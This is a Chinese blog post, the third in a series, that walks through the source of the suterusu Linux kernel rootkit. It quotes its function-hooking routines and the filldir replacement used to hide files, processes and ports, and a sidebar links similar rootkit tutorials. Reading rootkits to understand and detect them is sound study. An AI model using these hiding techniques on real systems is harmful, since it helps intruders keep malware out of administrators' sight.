Linux LKM suterusu代码分析(三)

最新推荐文章于 2021-06-16 14:12:02 发布
最新推荐文章于 2021-06-16 14:12:02 发布
阅读量711 收藏 1
点赞数 1
分类专栏: Linux hook
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42931917/article/details/109050417
版权

内核Hook 函数替换 文件隐藏 filldir 系统调用
关键词由CSDN通过智能技术生成

前面两篇讲了如何编译代码,以及函数hook的详细细节,这里讲一讲以下函数

    /* Hook /proc for hiding processes */
    proc_iterate = get_vfs_iterate("/proc");
    hijack_start(proc_iterate, &n_proc_iterate);

这里主要是修改系统调用的函数入口地址,n_proc_iterate()这个是自定义函数

#define ITERATE_PROTO struct file *file, struct dir_context *ctx
#define FILLDIR_VAR ctx->actor

//REPLACE_FILLDIR被定义成宏
#define REPLACE_FILLDIR(ITERATE_FUNC, FILLDIR_FUNC) \
{                                                   \
    *((filldir_t *)&ctx->actor) = &FILLDIR_FUNC;    \
    ret = ITERATE_FUNC(file, ctx);                  \
}

struct sym_hook {
    void *addr;
    unsigned char o_code[HIJACK_SIZE];
    unsigned char n_code[HIJACK_SIZE];
    struct list_head list;
};

int n_proc_iterate ( ITERATE_PROTO )
{
    int ret;
    proc_filldir = FILLDIR_VAR;

    hijack_pause(proc_iterate);
    REPLACE_FILLDIR(proc_iterate, n_proc_filldir);
    hijack_resume(proc_iterate);

    return ret;
}
//初始化指针头
LIST_HEAD(hooked_syms);

void hijack_pause ( void *target )
{
    struct sym_hook *sa;

    DEBUG_HOOK("Pausing function hook 0x%p\n", target);
    //遍历双向链表,寻找target
    list_for_each_entry ( sa, &hooked_syms, list )
        if ( target == sa->addr )
        {
            #if defined(_CONFIG_X86_) || defined(_CONFIG_X86_64_)
            unsigned long o_cr0 = disable_wp();
            memcpy(target, sa->o_code, HIJACK_SIZE);
            restore_wp(o_cr0);
            #else // ARM
            arm_write_hook(target, sa->o_code);
            #endif
        }
}
/*
list_for_each_entry
list_for_each_entry(pos,head,member)
iterate over list of given type
pos
the type * to use as a loop cursor.
head
the head for your list.
member
the name of the list_head within the struct.
*/
void hijack_resume ( void *target )
{
    struct sym_hook *sa;

    DEBUG_HOOK("Resuming function hook 0x%p\n", target);

    list_for_each_entry ( sa, &hooked_syms, list )
        if ( target == sa->addr )
        {
            #if defined(_CONFIG_X86_) || defined(_CONFIG_X86_64_)
            unsigned long o_cr0 = disable_wp();
            memcpy(target, sa->n_code, HIJACK_SIZE);
            restore_wp(o_cr0);
            #else // ARM
            arm_write_hook(target, sa->n_code);
            #endif
        }
}

将所有Hook函数组成一个双向链表,然后如果有相关API调用,则先遍历链表,修改函数入口地址,达到Hook效果。

这里说一说内核中遍历函数的步骤,sys_getdents ->iterate_dir -> struct file_operations 里的 iterate ->这儿省略若干层次 -> struct dir_context 里的 actor ,低版本内核中就是filldir。

filldir 负责把一项记录(比如说目录下的一个文件或者一个子目录)填到返回的缓冲区里。如果我们钩掉 filldir ,并在我们的钩子函数里对某些特定的记录予以直接丢弃,不填到缓冲区里,上层函数与应用程序就收不到那个记录,也就不知道那个文件或者文件夹的存在了,也就实现了文件隐藏。

具体说来,我们的隐藏逻辑如下: 篡改根目录(也就是“/”)的 iterate为我们的假 iterate , 在假函数里把 struct dir_context 里的 actor替换成我们的 假 filldir ,假 filldir 会把需要隐藏的文件过滤掉。

下面讲讲细节,这个函数主要作用就是把sock传入的参数过滤掉,这里主要讲的文件,文件夹,端口隐藏都是类似的。

struct hidden_file {
    char *name;
    struct list_head list;
};

static int n_root_filldir( struct dir_context *nrf_ctx, const char *name, int namelen, loff_t offset, u64 ino, unsigned d_type )
{
    struct hidden_file *hf;
    //比较链表中name和传入参数是否一致,如果一致则直接返回0,那么文件名就不被写入buff,ring 3 就看不到这个文件
    list_for_each_entry ( hf, &hidden_files, list )
        if ( ! strcmp(name, hf->name) )
            return 0;

    return root_filldir(nrf_ctx, name, namelen, offset, ino, d_type);
}
Configure-Handler
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
readdir系统调用解析
u011392033的博客
07-19 2179
为了理解readdir函数,首先需要理解DIR结构,以下是DIR的结构: typdef struct __dirstream { int fd; /* File descriptor. */ __libc_lock_define (, lock) /* Mutex lock for this structure. */
【安全通知】知名端口转发工具rinetd遭高仿投毒
Tencent_SRC的博客
12-02 4106
文|柯南、xti9er、harold事件概述近日,腾讯洋葱反入侵系统检测发现了一起仿造开源软件官方站点的钓鱼事件,并已与官方作者取得联系。事实上该开源软件目前仅在github发布,目前正...
Linux LKM suterusu代码分析(一)
qq_42931917的博客
10-13 3372
suterusu lkm 代码下载路径: https://github.com/mncoppola/suterusu 虽然这个LKM开发的时间是好几年前的,但是也是值得好好研究其中的hook原理,我这里使用的系统是 Ubuntu 14.04.1 LTS ,内核版本4.2.0-42-generic。 编译 --> make linux-x86 KDIR=/lib/modules/$(uname -r)/build 我们先来看看Makefile obj-m += suterusu.o suteru
Linux LKM suterusu代码分析(二)
qq_42931917的博客
10-13 1726
#include <stdio.h> #include <stdlib.h> #include "list.h" struct person { struct list_head list; int age; }; int main(int argc,char **argv) { int i; struct person *p; struct person person1; struct list_head *pos; I
Linux Rootkit 系列三:实例详解 Rootkit 必备的基本功能
whatday的专栏
07-23 917
本文所需的完整代码位于笔者的代码仓库:https://github.com/NoviceLive/research-rootkit。 测试建议:不要在物理机测试!不要在物理机测试! 不要在物理机测试! 概要 在上一篇文章中笔者详细地阐述了基于直接修改系统调用表 (即sys_call_table/ia32_sys_call_table)的挂钩, 文章强调以代码与动手实验为核心。 长...
Linux Rootkit系列三:实例详解 Rootkit 必备的基本功能
stonesharp的专栏
07-01 8672
前言 鉴于笔者知识能力上的不足,如有疏忽,欢迎纠正。 本文所需的完整代码位于笔者的代码仓库:https://github.com/NoviceLive/research-rootkit。 测试建议: 不要在物理机测试!不要在物理机测试! 不要在物理机测试! 概要 在 上一篇文章中笔者详细地阐述了基于直接修改系统调用表 (即 sys_call_t
Linux Rootkit Sample && Rootkit Defenser Analysis
weixin_30855761的博客
08-02 1377
目录 1. 引言 2. LRK5 Rootkit 3. knark Rootkit 3. Suckit(super user control kit) 4. adore-ng 5. WNPS 6. Sample Rootkit for Linux 7. suterusu 8. Rootkit Defense Tools 9. Linux Rootkit Scanner: k...
Linux 2.6内核下LKM安全性研究
04-18
同时针对基于LSM框架的SELinux模型保护LKM安全的不足之处,提出了使用LSM扩展技术在init_module函数的前后位置各放置安全钩子函数的解决方案,从而防止已经躲过安全性检查链接进内核的恶意模块对诸如sys_call_table...
后门技术和Linux LKM Rootkit详细解析
03-04
在本篇文章里, 我们将看到各种不同的后门技术,特别是Linux的可装载内核模块(LKM)。 我们将会发现LKM后门比传统的后门程序更加复杂,更加强大,更不易于被发现。知道这些之后,我们可以制造我们自己的基于LKM的...
LinuxLKM编程介绍
11-17
LinuxLKM编程介绍 附源码 适合Linux初学者入门内核编程
stmichael-lkm:圣迈克尔 Linux LKM
07-14
StMichael 是一个 LKM,它试图针对内核模块 rootkit 提供一定程度的保护。 它通过监视内核的各个部分以及可选的整个内核文本本身来提供这种保护,以进行可能表明存在恶意内核模块的修改。 如果检测到类似 rootkit ...
实验一Linux基础及LKM编程.docx
02-22
LKM,全称为Linux Kernel Modules,是Linux内核的一部分,允许开发者动态加载或卸载代码到内核中。掌握LKM编程需要了解以下几点: 1. **内核调用和数据结构**:理解内核提供的函数接口以及如何使用它们,同时要熟悉...
Linux hook系统调用open/read/write
热门推荐
qq_42931917的博客
09-30 1万+
测试系统: curtis@curtis-virtual-machine:~/Desktop$ uname -a Linux curtis-virtual-machine 4.2.0-42-generic #49~14.04.1-Ubuntu SMP Wed Jun 29 20:22:11 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux Hook 系统调用我们先要知道sys_call_table地址,这个可以看之前文章,同时我们要了解sys_open的函数原型: asmlin
Linux 进程隐藏之摘链隐藏
qq_42931917的博客
12-11 6399
0x01:先说说一般进程隐藏的常见方式 0x02:
Linux 隐藏驱动模块
qq_42931917的博客
09-09 5040
如果作为恶意驱动的话,肯定是希望自己模块加载之后不会被发现,那么就需要对安装的模块进行隐藏(其实就是让你使用查找命令找不到),使用以下函数在驱动初始化入口进行摘链+kobject_del()函数删除当前模块的kobject就可以起到在/sys/module中隐藏。 list_del_init(&__this_module.list); test.c #include <linux/module.h> MODULE_LICENSE("GPL"); MODULE_AUTHOR("cur
Linux ko加载过程劫持
qq_42931917的博客
10-19 4274
这里主要是用到int register_module_notifier(struct notifier_block *nb)的通知链机制,当有ko加载时,notifier函数被调用; register.c #include <linux/module.h> #include <linux/kernel.h> #include <linux/slab.h> MODULE_LICENSE("GPL"); nt success_int ( void ) { retu
通过修改pte页表属性使内存可写
qq_42931917的博客
06-16 2850
通过修改pte页表属性使内存可写 一、相关API /* * Lookup the page table entry for a virtual address. Return a pointer * to the entry and the level of the mapping. * * Note: We return pud and pmd either when the entry is marked large * or when the present bit is not set.
Linux 文件/文件夹隐藏(hook getdents)
qq_42931917的博客
09-28 2823
前面讲的都是一些基础,比如说拿到sys_call_table地址,简单的hook某个函数,这一节做一个文件/文件夹隐藏,就是hook住文件枚举API --> getdents()&getdents64() fshid.c #include <linux/init.h> #include <linux/module.h> #include <linux/syscalls.h> #include <linux/kallsyms.h> #include
LKMLinux 内核模块
最新发布
07-02
LKMLinux Kernel Module)是指Linux内核模块,它是Linux操作系统中可插拔的一部分,用于扩展和增强核心功能的一种机制。内核模块是编译后的二进制文件,可以在运行时动态加载到内核中而无需重新启动系统。这些模块...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值